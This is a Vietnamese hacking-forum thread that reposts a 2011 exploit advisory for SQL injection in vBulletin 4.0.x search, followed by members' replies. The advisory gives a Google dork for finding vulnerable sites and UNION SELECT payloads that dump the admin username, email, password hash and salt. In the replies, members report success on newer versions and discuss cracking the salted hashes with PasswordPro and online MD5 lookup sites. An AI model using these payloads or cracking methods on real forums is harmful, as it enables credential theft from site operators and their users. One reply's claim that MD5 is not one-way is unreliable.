[Hacking] SQL Injection VBB 4.x.x

[interpol]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
#[+] Discovered By : D4rkB1t
#[+] Site : 1337day.com Inj3ct0r Team
#[+] support e-mail : d4rkb1t@live.com

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.c...h?v=fR9RGCqIPkc

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin...4495&PID=564936

================================================== ==================
# #
# 888 d8 888 _ 888 ,d d8 #
# e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
# d888 888 d888 888 888d8b 888 888b 888 888 #
# 8888 888 / 888 888 888Y88b 888 8888 888 888 #
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
# "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
# #
================================================== ==================


# 1337day.com [2011-05-21]

--------------------------------------------------
Xem các chủ đề cùng chuyên mục:

• Kiểm soát hoàn toàn máy victim 13/05/2009
• Video hack & bảo mật Wireless [HQ] 24/09/2009
• Tìm shares nạn nhân trên Windows 10/05/2009
• Tools: Một số công cụ xem Password 12/05/2009
• [VideoTut] chiếm quyền admin VBB qua MySQL Dumper 16/11/2010
• Đọc trộm Yahoo Mail với Ferret, Cookie Editor & Cain 27/05/2009
• 1 DVD tài liệu về hack và crack rất rất hay !!! 03/09/2009
• [Video] How to crack Wireless password (WEP) 22/05/2009
• "Chôm" Password trong môi trường Switch 21/05/2009
• Spam bài viết ! 14/05/2009

+4 EXP

[sunboy]

4.0.x chứ không phải 4.x.x em

[interpol]

4.0.x chứ không phải 4.x.x em

Ở các phiên bản vbb cao hơn vẫn truy vấn ra được đoạn password đã được mã hóa.
Em đã thử với 2mit. và kết quả vẫn ra bình thường.
Hiện tại vẫn chưa crack được đoạn đó

[sunboy]

Ok, thank em.
Anh cũng thấy bên vietmatrix có post. Nhưng không để ý lắm vì nội dung eploit rõ ràng ghi Version: 4.0.x . Ai ngờ 4.1.0 vẫn dính... Tạm thời disable vậy..

[interpol]

Crack mãi không ra đoạn password Bị thiếu Dictionary

[sunboy]

Crack mãi không ra đoạn password Bị thiếu Dictionary

Đã dính SQL injection, thiếu gì cách mà phải crack pass...

[interpol]

Dù truy vấn được nhưng cũng chỉ ra đoạn password đã được mã hóa.
Dùng passwordpro vẫn chưa crack được do thiếu dictionary.
Đúng là khó mà ăn được VBB :d

[haihung_9x]

Bài này chỉ mang tính chất tham khảo là chính. Đến bây giờ cũng chưa có forum nào bị hack kiểu này cả. Dù tìm được pass nhưng pass đã được mã hóa MD5 như thế có mà giải bằng niềm tin à. .

Á thật ra không phải là không dịch ngược được từ dạng mã hóa MD5 về gốc. Mình nhớ có đọc được ở đâu đó họ nói răng. Dùng siêu máy tính có tốc độ hàng trăm teraflop (một teraflop tương đương với hiệu suất một nghìn tỷ phép tính/giây)thì mất khoảng 5 năm để giải mã. => MD5 không phải là dạng mã hóa 1 chiều theo đúng nghĩa.

+1 EXP

[interpol]

VBB không chỉ mã hóa password theo kiểu md5 bình thường.
Mình đang sử dụng passwordpro 3.1 Đang crack thử

[sunboy]

Md5 thì có thể ra (sha còn chơi được)...Cụ thể thế này.

hash = md5($pass) . $salt)

MD5 và SHA1 hơi xịn : http://www.md5decrypter.co.uk/
Này thì Joomla, VBB, MyBB, IPB... http://www.cmd5.org/

PS: Mấy cu cậu đừng test trên forum mình nhá,,, dựng cái lên test .